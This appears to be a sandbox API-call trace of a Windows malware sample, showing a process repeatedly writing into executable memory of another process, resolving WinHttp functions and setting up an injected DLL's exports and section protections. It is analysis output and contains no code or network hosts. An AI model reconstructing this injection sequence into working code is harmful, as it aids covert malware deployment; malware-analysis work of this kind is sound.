	[0230.247] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750724*, nSize=0xf, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750724*, lpNumberOfBytesWritten=0x12858c*=0xf) returned 1
	[0230.248] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.248] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.248] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.248] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.248] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.249] ResetEvent (hEvent=0x60c) returned 1
	[0230.249] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.249] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.249] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.249] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.249] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.249] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471c4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.250] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.250] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.250] lstrlenA (lpString="WinHttpOpen") returned 11
	[0230.250] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.250] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750736*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750736*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0230.250] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.250] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.250] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.250] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.251] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.251] ResetEvent (hEvent=0x60c) returned 1
	[0230.251] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.251] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.251] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.251] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.251] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.252] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471c8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.252] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.252] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.252] lstrlenA (lpString="WinHttpOpenRequest") returned 18
	[0230.252] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.253] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750744*, nSize=0x13, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750744*, lpNumberOfBytesWritten=0x12858c*=0x13) returned 1
	[0230.253] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.253] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.253] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.253] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.253] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.254] ResetEvent (hEvent=0x60c) returned 1
	[0230.254] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.254] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.254] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.254] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.254] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.254] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471cc, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.255] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.255] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.255] lstrlenA (lpString="WinHttpQueryDataAvailable") returned 25
	[0230.255] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.255] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275075a*, nSize=0x1a, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275075a*, lpNumberOfBytesWritten=0x12858c*=0x1a) returned 1
	[0230.255] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.256] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.256] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.256] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.256] ResetEvent (hEvent=0x60c) returned 1
	[0230.256] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.257] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.257] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.257] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.257] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.257] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471d0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.258] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.258] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.258] lstrlenA (lpString="WinHttpReadData") returned 15
	[0230.258] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.258] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750776*, nSize=0x10, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750776*, lpNumberOfBytesWritten=0x12858c*=0x10) returned 1
	[0230.258] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.258] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.258] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.259] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.259] ResetEvent (hEvent=0x60c) returned 1
	[0230.259] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.259] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.259] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.259] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.260] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471d4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.260] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.260] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.260] lstrlenA (lpString="WinHttpReceiveResponse") returned 22
	[0230.260] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.260] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750788*, nSize=0x17, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750788*, lpNumberOfBytesWritten=0x12858c*=0x17) returned 1
	[0230.261] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.261] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.261] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.261] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.262] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.262] ResetEvent (hEvent=0x60c) returned 1
	[0230.262] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.262] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.262] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.262] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.262] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471d8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.263] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.263] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.263] lstrlenA (lpString="WinHttpSendRequest") returned 18
	[0230.263] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.263] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27507a2*, nSize=0x13, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27507a2*, lpNumberOfBytesWritten=0x12858c*=0x13) returned 1
	[0230.264] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.264] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.264] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.264] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.265] ResetEvent (hEvent=0x60c) returned 1
	[0230.265] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.303] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.304] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.304] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.304] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.304] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471dc, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.304] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0230.304] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0230.304] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0230.304] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0230.304] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0230.304] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Start") returned -1
	[0230.304] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Control") returned 1
	[0230.305] lstrcmpA (lpString1="JNI_OnLoad", lpString2="FreeBuffer") returned 1
	[0230.305] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Release") returned -1
	[0230.305] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Start") returned -1
	[0230.305] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Control") returned 1
	[0230.305] lstrcmpA (lpString1="JNI_OnUnload", lpString2="FreeBuffer") returned 1
	[0230.305] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Release") returned -1
	[0230.305] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0230.305] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0230.305] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0230.305] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0230.305] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0230.305] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd41000, dwSize=0x15a8, flNewProtect=0x20, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.305] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd43000, dwSize=0x40, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.305] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd44000, dwSize=0x1b0, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.306] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd45000, dwSize=0x24, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.306] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd46000, dwSize=0xaa, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.306] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd47000, dwSize=0x538, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.306] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd48000, dwSize=0x128, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.306] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128660, nSize=0x70, lpNumberOfBytesRead=0x128640 | out: lpBuffer=0x128660*, lpNumberOfBytesRead=0x128640*=0x70) returned 1
	[0230.306] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.306] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.306] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2778460*, nSize=0x14, lpNumberOfBytesWritten=0x128638 | out: lpBuffer=0x2778460*, lpNumberOfBytesWritten=0x128638*=0x14) returned 1
	[0230.307] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128660*, nSize=0x70, lpNumberOfBytesWritten=0x128638 | out: lpBuffer=0x128660*, lpNumberOfBytesWritten=0x128638*=0x70) returned 1
	[0230.307] ResetEvent (hEvent=0x60c) returned 1
	[0230.307] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.307] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128660, nSize=0x70, lpNumberOfBytesRead=0x128638 | out: lpBuffer=0x128660*, lpNumberOfBytesRead=0x128638*=0x70) returned 1
	[0230.308] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0230.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x264ed0) returned 1
	[0230.308] lstrlenA (lpString="shareDll32") returned 10
	[0230.308] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.308] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x209fc0*, nSize=0xb, lpNumberOfBytesWritten=0x128b7c | out: lpBuffer=0x209fc0*, lpNumberOfBytesWritten=0x128b7c*=0xb) returned 1
	[0230.308] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.308] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ad240*, nSize=0x4, lpNumberOfBytesWritten=0x128b7c | out: lpBuffer=0x22ad240*, lpNumberOfBytesWritten=0x128b7c*=0x4) returned 1
	[0230.309] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x340000
	[0230.309] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x340000, lpBuffer=0x128fec*, nSize=0x400, lpNumberOfBytesWritten=0x128b7c | out: lpBuffer=0x128fec*, lpNumberOfBytesWritten=0x128b7c*=0x400) returned 1
	[0230.309] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x184, flAllocationType=0x3000, flProtect=0x40) returned 0x350000
	[0230.309] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x350000, lpBuffer=0x128de8*, nSize=0x184, lpNumberOfBytesWritten=0x128b78 | out: lpBuffer=0x128de8*, lpNumberOfBytesWritten=0x128b78*=0x184) returned 1
	[0230.310] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128b00, nSize=0x70, lpNumberOfBytesRead=0x128ae0 | out: lpBuffer=0x128b00*, lpNumberOfBytesRead=0x128ae0*=0x70) returned 1
	[0230.310] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0230.310] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x360000
	[0230.310] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x360000, lpBuffer=0x22a6260*, nSize=0x28, lpNumberOfBytesWritten=0x128ad8 | out: lpBuffer=0x22a6260*, lpNumberOfBytesWritten=0x128ad8*=0x28) returned 1
	[0230.310] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128b00*, nSize=0x70, lpNumberOfBytesWritten=0x128ad8 | out: lpBuffer=0x128b00*, lpNumberOfBytesWritten=0x128ad8*=0x70) returned 1
	[0230.311] ResetEvent (hEvent=0x60c) returned 1
	[0230.311] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.311] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128b00, nSize=0x70, lpNumberOfBytesRead=0x128ad8 | out: lpBuffer=0x128b00*, lpNumberOfBytesRead=0x128ad8*=0x70) returned 1
	[0230.311] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0230.311] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x340000, lpBuffer=0x128fec, nSize=0x400, lpNumberOfBytesRead=0x128b90 | out: lpBuffer=0x128fec*, lpNumberOfBytesRead=0x128b90*=0x400) returned 1
	[0230.311] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.311] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0230.311] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.311] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.312] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.312] lstrlenA (lpString="control") returned 7
	[0230.312] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.312] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x22ad2d0*, nSize=0x8, lpNumberOfBytesWritten=0x128b70 | out: lpBuffer=0x22ad2d0*, lpNumberOfBytesWritten=0x128b70*=0x8) returned 1
	[0230.312] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
